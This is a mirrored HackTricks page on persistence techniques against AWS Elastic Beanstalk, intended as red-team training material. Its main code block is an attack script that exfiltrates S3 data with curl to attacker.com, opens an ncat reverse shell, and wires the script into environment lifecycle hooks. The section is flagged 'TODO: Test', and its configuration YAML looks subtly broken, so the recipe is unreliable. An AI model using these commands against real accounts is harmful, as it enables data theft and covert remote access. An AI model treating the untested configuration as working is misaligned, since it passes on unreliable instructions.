mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-14 13:56:30 -08:00
105 lines
5.2 KiB
Markdown
105 lines
5.2 KiB
Markdown
# AWS - Elastic Beanstalk Persistence
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## Elastic Beanstalk
|
|
|
|
For more information check:
|
|
|
|
{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
|
|
[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
|
|
{% endcontent-ref %}
|
|
|
|
### Persistence in Instance
|
|
|
|
In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
|
|
|
|
### Backdoor in Version
|
|
|
|
An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
|
|
|
|
### New backdoored version
|
|
|
|
Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
|
|
|
|
### Abusing Custom Resource Lifecycle Hooks
|
|
|
|
{% hint style="info" %}
|
|
TODO: Test
|
|
{% endhint %}
|
|
|
|
Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
|
|
|
|
```bash
|
|
bashCopy code# Attacker creates a script that exfiltrates data and maintains access
|
|
echo '#!/bin/bash
|
|
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
|
|
gzip /tmp/data.csv
|
|
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
|
|
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh
|
|
|
|
# Attacker uploads the script to an S3 bucket
|
|
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh
|
|
|
|
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
|
|
echo 'Resources:
|
|
AWSEBAutoScalingGroup:
|
|
Metadata:
|
|
AWS::ElasticBeanstalk::Ext:
|
|
TriggerConfiguration:
|
|
triggers:
|
|
- name: stealthy-lifecycle-hook
|
|
events:
|
|
- "autoscaling:EC2_INSTANCE_LAUNCH"
|
|
- "autoscaling:EC2_INSTANCE_TERMINATE"
|
|
target:
|
|
ref: "AWS::ElasticBeanstalk::Environment"
|
|
arn:
|
|
Fn::GetAtt:
|
|
- "AWS::ElasticBeanstalk::Environment"
|
|
- "Arn"
|
|
stealthyLifecycleHook:
|
|
Type: AWS::AutoScaling::LifecycleHook
|
|
Properties:
|
|
AutoScalingGroupName:
|
|
Ref: AWSEBAutoScalingGroup
|
|
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
|
|
NotificationTargetARN:
|
|
Ref: stealthy-lifecycle-hook
|
|
RoleARN:
|
|
Fn::GetAtt:
|
|
- AWSEBAutoScalingGroup
|
|
- Arn' > stealthy_lifecycle_hook.yaml
|
|
|
|
# Attacker applies the new environment configuration
|
|
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
|
|
```
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|